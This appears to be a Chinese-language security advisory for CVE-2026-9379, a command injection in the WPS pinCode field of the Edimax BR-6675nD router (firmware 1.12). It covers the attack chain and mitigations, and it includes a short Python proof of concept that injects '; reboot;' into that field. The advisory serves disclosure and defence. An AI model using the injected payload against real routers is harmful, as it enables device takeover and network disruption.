CVE-2026-9379 CVSS 6.3 中危

CVE-2026-9379 Edimax路由器命令注入漏洞

披露日期: 2026-05-24

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-9379

漏洞类型

命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Edimax BR-6675nD

漏洞概述

Edimax BR-6675nD 路由器 1.12 版本存在命令注入漏洞。该漏洞位于 /goform/formWpsStart 接口，由于未正确过滤 pinCode 参数，导致攻击者可注入恶意系统命令。攻击者无需用户交互，仅需低权限即可远程发起攻击。目前利用代码已公开，厂商尚未响应，存在较高安全风险。

技术细节

该漏洞影响 Edimax BR-6675nD 路由器 1.12 版本，属于典型的操作系统命令注入漏洞。其技术根源在于 Web 管理界面的后台处理逻辑中，负责处理 WPS（Wi-Fi Protected Setup）功能的 /goform/formWpsStart 接口存在严重的输入验证缺失。具体而言，该接口在接收用户通过 POST 表单提交的 pinCode 参数时，直接将其传递给底层的系统命令执行函数，而未进行任何安全过滤或转义。攻击者可以利用这一缺陷，在 pinCode 字段中注入恶意的 Shell 命令（例如使用 ; 或 && 连接符）。当服务器端程序处理该请求时，恶意指令将与原有命令一同被操作系统 Shell 执行。由于攻击向量为网络（AV:N），且无需用户交互（UI:N），远程攻击者可利用此漏洞在路由器上执行任意代码，获取设备控制权，进而窃取网络流量或瘫痪网络服务。

攻击链分析

STEP 1

信息收集

攻击者在网络中扫描并识别出存在漏洞的 Edimax BR-6675nD 路由器设备。

STEP 2

漏洞利用

攻击者构造包含恶意命令的 HTTP POST 请求，发送至路由器的 /goform/formWpsStart 接口，利用 pinCode 参数的命令注入漏洞。

STEP 3

命令执行

路由器后端程序未过滤恶意字符，直接将参数传递给系统 Shell 执行，导致攻击者的恶意命令在设备上运行。

STEP 4

建立控制

攻击者通过执行的命令获取 Shell 权限，窃取配置信息、修改网络设置或进一步植入后门，从而完全控制路由器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_cve_2026_9379(target_ip):
    """
    PoC for CVE-2026-9379 (Edimax BR-6675nD Command Injection)
    """
    target_url = f"http://{target_ip}/goform/formWpsStart"
    
    # Payload to execute a simple command (e.g., reboot or create a file)
    # Using ';' to inject the command
    malicious_payload = "12345678; reboot;"

    # Data payload to be sent in the POST request
    data = {
        "pinCode": malicious_payload
    }

    try:
        print(f"[*] Sending payload to {target_url}...")
        response = requests.post(target_url, data=data, timeout=5)
        
        if response.status_code == 200:
            print("[+] Payload sent successfully. Check if the device rebooted or command executed.")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with the actual target IP address
    target = "192.168.1.1"
    exploit_cve_2026_9379(target)

影响范围

Edimax BR-6675nD 1.12

防御指南

临时缓解措施

由于厂商目前尚未发布修复补丁，建议用户采取网络隔离措施，将路由器管理界面置于防火墙之后，禁止外部网络访问。同时，可以暂时禁用 WPS 功能，并密切监控路由器的异常流量和行为。若条件允许，建议更换为其他已修复该漏洞的品牌或型号路由器。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表